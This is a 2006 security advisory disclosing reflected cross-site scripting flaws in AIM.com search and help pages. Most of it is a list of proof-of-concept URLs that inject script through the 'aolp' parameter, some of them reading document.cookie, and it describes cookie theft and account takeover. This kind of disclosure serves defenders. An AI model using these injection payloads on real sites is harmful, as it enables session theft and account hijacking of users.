aimXSS.txt

`Title: AIM Multiple Cross Site Scripting  
  
Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>  
Discovered: 26 December 2005  
Published: 7 January 2006  
MorX Security Research Team  
http://www.morx.org  
  
Service: Web  
  
Vendor: AIM.com  
  
Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks  
  
Severity: Medium/High  
  
Tested on: Microsoft IE 6.0 and FireFox 5.1  
  
Details:  
  
AIM.com search engines are created with AOLserver Dynamic Pages (or ADP).  
ADP are a set of web server extensions for designing dynamically created  
documents. Utilizing AOLserver, ADP return a document to the user based on  
running a set of Tcl code with arguments provided by the user. They are  
based on Microsoft's own Active Server Pages.  
AIM.com ADP scripts are prone to cross-site scripting attacks. This  
problem is due to a failure in the applications to properly sanitize  
user-supplied input.  
  
Impact:  
  
an attacker can exploit the vulnerable scripts to have arbitrary script  
code executed in the browser of an authentified AIM user in the context of  
the AIM webpage. resulting in the theft of cookie-based authentication  
giving the attacker temporary access to the victim's account (email box,  
etc) as well as other type of attacks.  
  
Screen captures:  
  
http://www.morx.org/AIM-XSS.jpg  
http://www.morx.org/AIM2-XSS.JPG  
http://www.morx.org/AIM3-XSS.JPG  
http://www.morx.org/AIM4-XSS.JPG  
  
Affected scripts with proof of concept exploit:  
  
http://www.aim.com/acronyms.adp?aolp="><script>alert(document.cookie)</script>  
http://www.aim.com/remote/step1.adp?aolp=><script>alert(document.cookie)</script>  
http://www.aim.com/remote/index.adp?aolp="><script>alert('VULNERABLE')</script>  
http://www.aim.com/developer.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/get_aim/express/aim_expr.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/international.adp?aolp=""><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/security/faq.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/security/trojan.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/emoticons.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/chats.adp?aolp="><script>alert('VULNERABLE')</script>  
http://www.aim.com/download.adp?aolp="><script>alert('VULNERABLE')</script>  
http://www.aim.com/get_aim/linux/latest_linux.adp?aolp="><script>alert('VULNERABLE')</script>  
http://www.aim.com/get_aim/win/other_win.adp?aolp="><script>alert('VULNERABLE')</script>  
http://www.aim.com/get_aim/win/latest_win.adp?aolp="><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/using/aimexpress.adp?aolp="><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/gethelp.adp?aolp="><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/security/report.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/error_mess/index.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/starting_out/index.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/using/index.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/forgot_password/password.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/tos/privacy_policy.adp?aolp=><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/error_mess/winerrors_buddylist.adp?aolp="><script>alert('VULNERABLE')</script>  
http://www.aim.com/help_faq/using/aimexpress.adp?aolp=  
http://us.video.aim.com/speed.adp?msg=large&url=%2fmain%2eadp%3f"><script>alert('VULNERABLE')</script>  
  
Disclaimer:  
  
this entire document is for eductional, testing and demonstrating purpose  
only. Modification use and/or publishing this information is entirely on  
your OWN risk. The information provided in this advisory is to be  
used/tested on your OWN machine/Account. I cannot be held responsible for  
any of the above.  
`